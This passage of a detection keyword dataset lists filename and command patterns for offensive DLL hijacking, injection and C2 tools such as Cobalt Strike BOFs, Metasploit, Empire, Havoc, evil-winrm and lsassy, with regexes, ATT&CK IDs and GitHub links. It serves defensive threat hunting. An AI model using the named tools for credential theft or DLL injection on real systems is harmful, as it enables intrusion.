TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*dll* [HIJACKABLE]*",".{0,1000}dll.{0,1000}\s\[HIJACKABLE\].{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find linked DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*dll\reflective_dll.*",".{0,1000}dll\\reflective_dll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*dll_generator.py*",".{0,1000}dll_generator\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" 
"*dll_hijack_detect_x64*",".{0,1000}dll_hijack_detect_x64.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*dll_hijack_detect_x86*",".{0,1000}dll_hijack_detect_x86.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*dll_hijack_hunter*",".{0,1000}dll_hijack_hunter.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*DLL_Imports_BOF*",".{0,1000}DLL_Imports_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*dll_inject.rb*",".{0,1000}dll_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLL_METASPLOIT_ATTACH*",".{0,1000}DLL_METASPLOIT_ATTACH.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*dll_spawn_cmd.cpp*",".{0,1000}dll_spawn_cmd\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dll_spawn_cmd.exe*",".{0,1000}dll_spawn_cmd\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DLL_TO_HIJACK_WIN10*",".{0,1000}DLL_TO_HIJACK_WIN10.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of 
@itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*DllCanUnloadNow*",".{0,1000}DllCanUnloadNow.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*dllexploit.*",".{0,1000}dllexploit\..{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*DllExport -*",".{0,1000}DllExport\s\-.{0,1000}","offensive_tool_keyword","C2 related 
tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLLHijackAuditKit.zip*",".{0,1000}DLLHijackAuditKit\.zip.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLL-Hijack-Search-Order-BOF*",".{0,1000}DLL\-Hijack\-Search\-Order\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*DLLHijackTest.dll*",".{0,1000}DLLHijackTest\.dll.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*DLLHijackTest.sln*",".{0,1000}DLLHijackTest\.sln.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*DLLHijackTest-master*",".{0,1000}DLLHijackTest\-master.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*dllinject *",".{0,1000}dllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dllinject.py*",".{0,1000}dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*-DllInjection.ps1*",".{0,1000}\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllInstall is used when executing the Merlin agent with regsvr32.exe*",".{0,1000}DllInstall\sis\sused\swhen\sexecuting\sthe\sMerlin\sagent\swith\sregsvr32\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*dllKitten.dll*",".{0,1000}dllKitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*DllLdr.x64.bin*",".{0,1000}DllLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*dllload *",".{0,1000}dllload\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Dll-Loader -http -path *",".{0,1000}Dll\-Loader\s\-http\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Dll-Loader -local -path*",".{0,1000}Dll\-Loader\s\-local\s\-path.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). 
of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Dll-Loader -smb -path *",".{0,1000}Dll\-Loader\s\-smb\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*DllLoaderLoader.exe*",".{0,1000}DllLoaderLoader\.exe.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*-DllName *-Module *",".{0,1000}\-DllName\s.{0,1000}\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllNotificationInjection.cpp*",".{0,1000}DllNotificationInjection\.cpp.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.exe*",".{0,1000}DllNotificationInjection\.exe.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification 
